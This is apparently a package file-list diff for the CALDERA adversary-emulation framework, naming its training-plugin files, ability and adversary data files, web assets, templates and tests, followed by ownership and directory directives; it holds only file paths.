+%%WWWDIR%%/plugins/training/app/flags/operations/flag_1.py +%%WWWDIR%%/plugins/training/app/flags/operations/flag_2.py +%%WWWDIR%%/plugins/training/app/flags/operations/flag_3.py +%%WWWDIR%%/plugins/training/app/flags/plugins/compass/flag_0.py +%%WWWDIR%%/plugins/training/app/flags/plugins/manx/flag_0.py +%%WWWDIR%%/plugins/training/app/flags/plugins/manx/flag_1.py +%%WWWDIR%%/plugins/training/app/flags/plugins/mock/flag_0.py +%%WWWDIR%%/plugins/training/app/flags/plugins/response/flag_0.py +%%WWWDIR%%/plugins/training/app/flags/plugins/response/flag_1.py +%%WWWDIR%%/plugins/training/app/training_api.py +%%WWWDIR%%/plugins/training/data/abilities/training/18702cd3-8e98-4eb7-99d4-0d2816926af1.yml +%%WWWDIR%%/plugins/training/data/abilities/training/586140a1-9755-4996-883d-82a17c7737b2.yml +%%WWWDIR%%/plugins/training/data/abilities/training/6d53c4a8-ecd3-4131-a7a2-704a5b43dd83.yml 
+%%WWWDIR%%/plugins/training/data/abilities/training/e13c4e45-d19f-440e-8a72-fad728a1789c.yml +%%WWWDIR%%/plugins/training/data/abilities/training/f0d77555-fa79-4884-8afd-73d39f887879.yml +%%WWWDIR%%/plugins/training/data/abilities/training/fc4715ac-758e-4ba9-9e52-d07ff3d22a74.yml +%%WWWDIR%%/plugins/training/data/adversaries/08619190-9eb5-4f35-97e1-0dafe04e0203.yml +%%WWWDIR%%/plugins/training/data/adversaries/2885d0fe-60a7-469b-9e2e-a46b7be2b4df.yml +%%WWWDIR%%/plugins/training/data/adversaries/2c99958e-36e0-4fab-bcdf-977926a58cd6.yml +%%WWWDIR%%/plugins/training/data/adversaries/72c0b333-f6fe-4fa0-a342-4215e8de3947.yml +%%WWWDIR%%/plugins/training/data/adversaries/890508db-9646-4a2d-8d1a-4ea25b3ce02a.yml +%%WWWDIR%%/plugins/training/data/adversaries/9fbc7164-9175-4fc6-bb20-9669dc121df8.yml +%%WWWDIR%%/plugins/training/data/certifications/8da8f0b3-194a-4eed-95b0-43c1f1b64091.yml +%%WWWDIR%%/plugins/training/data/certifications/9cd5f3a0-765d-45bc-85c2-bc76d4282599.yml +%%WWWDIR%%/plugins/training/data/payloads/phish_email.txt +%%WWWDIR%%/plugins/training/hook.py +%%WWWDIR%%/plugins/training/package-lock.json +%%WWWDIR%%/plugins/training/package.json +%%WWWDIR%%/plugins/training/solution_guides/AdvancedFlag0.md +%%WWWDIR%%/plugins/training/solution_guides/AdvancedFlag1.md +%%WWWDIR%%/plugins/training/solution_guides/AdvancedFlag2.md +%%WWWDIR%%/plugins/training/solution_guides/AdversariesFlag0.md +%%WWWDIR%%/plugins/training/solution_guides/AdversariesFlag1.md +%%WWWDIR%%/plugins/training/solution_guides/AdversariesFlag2.md +%%WWWDIR%%/plugins/training/solution_guides/AgentsFlag0.md +%%WWWDIR%%/plugins/training/solution_guides/AgentsFlag1.md +%%WWWDIR%%/plugins/training/solution_guides/AgentsFlag2.md +%%WWWDIR%%/plugins/training/solution_guides/AgentsFlag3.md +%%WWWDIR%%/plugins/training/solution_guides/AgentsFlag4.md +%%WWWDIR%%/plugins/training/solution_guides/AgentsFlag5.md +%%WWWDIR%%/plugins/training/solution_guides/AgentsFlag6.md 
+%%WWWDIR%%/plugins/training/solution_guides/AgentsFlag7.md +%%WWWDIR%%/plugins/training/solution_guides/OperationsFlag0.md +%%WWWDIR%%/plugins/training/solution_guides/OperationsFlag1.md +%%WWWDIR%%/plugins/training/solution_guides/OperationsFlag2.md +%%WWWDIR%%/plugins/training/solution_guides/OperationsFlag3.md +%%WWWDIR%%/plugins/training/solution_guides/PluginsManxFlag0.md +%%WWWDIR%%/plugins/training/solution_guides/PluginsManxFlag1.md +%%WWWDIR%%/plugins/training/solution_guides/PluginsMockFlag0.md +%%WWWDIR%%/plugins/training/solution_guides/PluginsResponseFlag0.md +%%WWWDIR%%/plugins/training/solution_guides/PluginsResponseFlag1.md +%%WWWDIR%%/plugins/training/static/css/markdown.css +%%WWWDIR%%/plugins/training/static/img/badges/advanced.png +%%WWWDIR%%/plugins/training/static/img/badges/adversaries.png +%%WWWDIR%%/plugins/training/static/img/badges/agents.png +%%WWWDIR%%/plugins/training/static/img/badges/atomic.png +%%WWWDIR%%/plugins/training/static/img/badges/attack.png +%%WWWDIR%%/plugins/training/static/img/badges/autonomous.png +%%WWWDIR%%/plugins/training/static/img/badges/compass.png +%%WWWDIR%%/plugins/training/static/img/badges/defaultlock.png +%%WWWDIR%%/plugins/training/static/img/badges/developers.png +%%WWWDIR%%/plugins/training/static/img/badges/gameboard.png +%%WWWDIR%%/plugins/training/static/img/badges/manual.png +%%WWWDIR%%/plugins/training/static/img/badges/manx.png +%%WWWDIR%%/plugins/training/static/img/badges/mock.png +%%WWWDIR%%/plugins/training/static/img/badges/operations.png +%%WWWDIR%%/plugins/training/static/img/badges/response.png +%%WWWDIR%%/plugins/training/static/img/certification.png +%%WWWDIR%%/plugins/training/static/js/alpine.min.js +%%WWWDIR%%/plugins/training/templates/certificate_solution_guide.html +%%WWWDIR%%/plugins/training/templates/flag_solution_guide.html +%%WWWDIR%%/plugins/training/templates/training.html +%%WWWDIR%%/plugins/training/tests/__init__.py +%%WWWDIR%%/plugins/training/tests/app/__init__.py 
+%%WWWDIR%%/plugins/training/tests/app/flags/advanced/test_flag0.py +%%WWWDIR%%/plugins/training/tests/app/test_badge.py +%%WWWDIR%%/plugins/training/tests/app/test_certification.py +%%WWWDIR%%/requirements-dev.txt +%%WWWDIR%%/requirements.txt +%%WWWDIR%%/server.py +%%WWWDIR%%/sonar-project.properties +%%WWWDIR%%/static/css/basic.css +%%WWWDIR%%/static/css/core.css +%%WWWDIR%%/static/css/file-explorer.css +%%WWWDIR%%/static/css/lib/bulma-tooltip.min.css +%%WWWDIR%%/static/css/lib/custom-bulma.css +%%WWWDIR%%/static/css/lib/custom-bulma.css.map +%%WWWDIR%%/static/css/lib/fa-all.min.css +%%WWWDIR%%/static/css/modal.css +%%WWWDIR%%/static/css/multi-select.css +%%WWWDIR%%/static/css/shared.css +%%WWWDIR%%/static/css/timeline.css +%%WWWDIR%%/static/css/webfonts/fa-brands-400.eot +%%WWWDIR%%/static/css/webfonts/fa-brands-400.svg +%%WWWDIR%%/static/css/webfonts/fa-brands-400.ttf +%%WWWDIR%%/static/css/webfonts/fa-brands-400.woff +%%WWWDIR%%/static/css/webfonts/fa-brands-400.woff2 +%%WWWDIR%%/static/css/webfonts/fa-regular-400.eot +%%WWWDIR%%/static/css/webfonts/fa-regular-400.svg +%%WWWDIR%%/static/css/webfonts/fa-regular-400.ttf +%%WWWDIR%%/static/css/webfonts/fa-regular-400.woff +%%WWWDIR%%/static/css/webfonts/fa-regular-400.woff2 +%%WWWDIR%%/static/css/webfonts/fa-solid-900.eot +%%WWWDIR%%/static/css/webfonts/fa-solid-900.svg +%%WWWDIR%%/static/css/webfonts/fa-solid-900.ttf +%%WWWDIR%%/static/css/webfonts/fa-solid-900.woff +%%WWWDIR%%/static/css/webfonts/fa-solid-900.woff2 +%%WWWDIR%%/static/img/additional-fields.png +%%WWWDIR%%/static/img/back-blue.png +%%WWWDIR%%/static/img/back-grey.jpg +%%WWWDIR%%/static/img/back-red.png +%%WWWDIR%%/static/img/caldera-logo.png +%%WWWDIR%%/static/img/compass.png +%%WWWDIR%%/static/img/contact.png +%%WWWDIR%%/static/img/darwin.png +%%WWWDIR%%/static/img/duk.png +%%WWWDIR%%/static/img/errors.png +%%WWWDIR%%/static/img/executor.png +%%WWWDIR%%/static/img/expand.png +%%WWWDIR%%/static/img/facts.png +%%WWWDIR%%/static/img/favicon.png 
+%%WWWDIR%%/static/img/file.png +%%WWWDIR%%/static/img/folder.png +%%WWWDIR%%/static/img/group.png +%%WWWDIR%%/static/img/hacker.png +%%WWWDIR%%/static/img/linux.png +%%WWWDIR%%/static/img/obfuscation.png +%%WWWDIR%%/static/img/operation.png +%%WWWDIR%%/static/img/payload.png +%%WWWDIR%%/static/img/planner.png +%%WWWDIR%%/static/img/planners.png +%%WWWDIR%%/static/img/plus.png +%%WWWDIR%%/static/img/recycle.png +%%WWWDIR%%/static/img/success.png +%%WWWDIR%%/static/img/switch.png +%%WWWDIR%%/static/img/weather.jpg +%%WWWDIR%%/static/img/windows.png +%%WWWDIR%%/static/img/x.png +%%WWWDIR%%/static/jquery/images/ui-icons_444444_256x240.png +%%WWWDIR%%/static/jquery/images/ui-icons_555555_256x240.png +%%WWWDIR%%/static/jquery/images/ui-icons_777620_256x240.png +%%WWWDIR%%/static/jquery/images/ui-icons_777777_256x240.png +%%WWWDIR%%/static/jquery/images/ui-icons_cc0000_256x240.png +%%WWWDIR%%/static/jquery/images/ui-icons_ffffff_256x240.png +%%WWWDIR%%/static/jquery/jquery.js +%%WWWDIR%%/static/jquery/jquery.min.js +%%WWWDIR%%/static/jquery/jquery.multi-select.js +%%WWWDIR%%/static/js/ability.js +%%WWWDIR%%/static/js/core.js +%%WWWDIR%%/static/js/lib/alpine.min.js +%%WWWDIR%%/static/js/lib/bulma-toast.min.js +%%WWWDIR%%/static/js/lib/confetti.browser.min.js +%%WWWDIR%%/static/js/lib/muuri.min.js +%%WWWDIR%%/static/js/shared.js +%%WWWDIR%%/static/scss/bulma/bulma.sass +%%WWWDIR%%/static/scss/bulma/sass/base/_all.sass +%%WWWDIR%%/static/scss/bulma/sass/base/animations.sass +%%WWWDIR%%/static/scss/bulma/sass/base/generic.sass +%%WWWDIR%%/static/scss/bulma/sass/base/helpers.sass +%%WWWDIR%%/static/scss/bulma/sass/base/minireset.sass +%%WWWDIR%%/static/scss/bulma/sass/components/_all.sass +%%WWWDIR%%/static/scss/bulma/sass/components/breadcrumb.sass +%%WWWDIR%%/static/scss/bulma/sass/components/card.sass +%%WWWDIR%%/static/scss/bulma/sass/components/dropdown.sass +%%WWWDIR%%/static/scss/bulma/sass/components/level.sass +%%WWWDIR%%/static/scss/bulma/sass/components/media.sass 
+%%WWWDIR%%/static/scss/bulma/sass/components/menu.sass +%%WWWDIR%%/static/scss/bulma/sass/components/message.sass +%%WWWDIR%%/static/scss/bulma/sass/components/modal.sass +%%WWWDIR%%/static/scss/bulma/sass/components/navbar.sass +%%WWWDIR%%/static/scss/bulma/sass/components/pagination.sass +%%WWWDIR%%/static/scss/bulma/sass/components/panel.sass +%%WWWDIR%%/static/scss/bulma/sass/components/tabs.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/_all.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/box.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/button.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/container.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/content.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/form.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/icon.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/image.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/notification.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/other.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/progress.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/table.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/tag.sass +%%WWWDIR%%/static/scss/bulma/sass/elements/title.sass +%%WWWDIR%%/static/scss/bulma/sass/form/_all.sass +%%WWWDIR%%/static/scss/bulma/sass/form/checkbox-radio.sass +%%WWWDIR%%/static/scss/bulma/sass/form/file.sass +%%WWWDIR%%/static/scss/bulma/sass/form/input-textarea.sass +%%WWWDIR%%/static/scss/bulma/sass/form/select.sass +%%WWWDIR%%/static/scss/bulma/sass/form/shared.sass +%%WWWDIR%%/static/scss/bulma/sass/form/tools.sass +%%WWWDIR%%/static/scss/bulma/sass/grid/_all.sass +%%WWWDIR%%/static/scss/bulma/sass/grid/columns.sass +%%WWWDIR%%/static/scss/bulma/sass/grid/tiles.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/_all.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/color.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/flexbox.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/float.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/other.sass 
+%%WWWDIR%%/static/scss/bulma/sass/helpers/overflow.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/position.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/spacing.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/typography.sass +%%WWWDIR%%/static/scss/bulma/sass/helpers/visibility.sass +%%WWWDIR%%/static/scss/bulma/sass/layout/_all.sass +%%WWWDIR%%/static/scss/bulma/sass/layout/footer.sass +%%WWWDIR%%/static/scss/bulma/sass/layout/hero.sass +%%WWWDIR%%/static/scss/bulma/sass/layout/section.sass +%%WWWDIR%%/static/scss/bulma/sass/utilities/_all.sass +%%WWWDIR%%/static/scss/bulma/sass/utilities/animations.sass +%%WWWDIR%%/static/scss/bulma/sass/utilities/controls.sass +%%WWWDIR%%/static/scss/bulma/sass/utilities/derived-variables.sass +%%WWWDIR%%/static/scss/bulma/sass/utilities/extends.sass +%%WWWDIR%%/static/scss/bulma/sass/utilities/functions.sass +%%WWWDIR%%/static/scss/bulma/sass/utilities/initial-variables.sass +%%WWWDIR%%/static/scss/bulma/sass/utilities/mixins.sass +%%WWWDIR%%/static/scss/custom-bulma.sass +%%WWWDIR%%/templates/abilities.html +%%WWWDIR%%/templates/adversaries.html +%%WWWDIR%%/templates/agents.html +%%WWWDIR%%/templates/configurations.html +%%WWWDIR%%/templates/contacts.html +%%WWWDIR%%/templates/core.html +%%WWWDIR%%/templates/core_blue.html +%%WWWDIR%%/templates/core_red.html +%%WWWDIR%%/templates/exfilled_files.html +%%WWWDIR%%/templates/login.html +%%WWWDIR%%/templates/obfuscators.html +%%WWWDIR%%/templates/objectives.html +%%WWWDIR%%/templates/operations.html +%%WWWDIR%%/templates/planners.html +%%WWWDIR%%/templates/sources.html +%%WWWDIR%%/templates/weather.html +%%WWWDIR%%/tests/__init__.py +%%WWWDIR%%/tests/api/__init__.py +%%WWWDIR%%/tests/api/v2/__init__.py +%%WWWDIR%%/tests/api/v2/handlers/test_abilities_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_adversaries_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_agents_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_contacts_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_health_api.py 
+%%WWWDIR%%/tests/api/v2/handlers/test_obfuscators_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_objectives_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_operations_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_planners_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_plugins_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_schedules_api.py +%%WWWDIR%%/tests/api/v2/handlers/test_sources_api.py +%%WWWDIR%%/tests/api/v2/managers/test_base_api_manager.py +%%WWWDIR%%/tests/api/v2/managers/test_config_api_manager.py +%%WWWDIR%%/tests/api/v2/test_knowledge.py +%%WWWDIR%%/tests/api/v2/test_responses.py +%%WWWDIR%%/tests/api/v2/test_security.py +%%WWWDIR%%/tests/api/v2/test_validation.py +%%WWWDIR%%/tests/conftest.py +%%WWWDIR%%/tests/contacts/test_contact_dns.py +%%WWWDIR%%/tests/contacts/test_contact_ftp.py +%%WWWDIR%%/tests/contacts/test_contact_gist.py +%%WWWDIR%%/tests/contacts/test_contact_tcp.py +%%WWWDIR%%/tests/contacts/test_ssh_tunneling.py +%%WWWDIR%%/tests/objects/__init__.py +%%WWWDIR%%/tests/objects/test_ability.py +%%WWWDIR%%/tests/objects/test_adversary.py +%%WWWDIR%%/tests/objects/test_agent.py +%%WWWDIR%%/tests/objects/test_data_encoder.py +%%WWWDIR%%/tests/objects/test_fact.py +%%WWWDIR%%/tests/objects/test_link.py +%%WWWDIR%%/tests/objects/test_objective.py +%%WWWDIR%%/tests/objects/test_operation.py +%%WWWDIR%%/tests/parsers/__init__.py +%%WWWDIR%%/tests/parsers/test_parsers.py +%%WWWDIR%%/tests/services/__init__.py +%%WWWDIR%%/tests/services/test_app_svc.py +%%WWWDIR%%/tests/services/test_contact_svc.py +%%WWWDIR%%/tests/services/test_data_svc.py +%%WWWDIR%%/tests/services/test_file_svc.py +%%WWWDIR%%/tests/services/test_knowledge_svc.py +%%WWWDIR%%/tests/services/test_learning_svc.py +%%WWWDIR%%/tests/services/test_planning_svc.py +%%WWWDIR%%/tests/services/test_rest_svc.py +%%WWWDIR%%/tests/utility/test_base_object.py +%%WWWDIR%%/tests/utility/test_base_world.py +%%WWWDIR%%/tests/utility/test_ip_rule.py +%%WWWDIR%%/tests/web_server/test_core_endpoints.py 
+%%WWWDIR%%/tox.ini
+@mode 750
+@owner www
+@group www
+@dir %%WWWDIR%%
+@dir %%WWWDIR%%/plugins
+@dir %%WWWDIR%%/plugins/atomic/data
+@dir %%WWWDIR%%/plugins/atomic
+@dir %%WWWDIR%%/plugins/fieldmanual/sphinx-docs/plugins
+@dir %%WWWDIR%%/plugins/fieldmanual/sphinx-docs
+@dir %%WWWDIR%%/plugins/fieldmanual
+@mode
+@owner
+@group |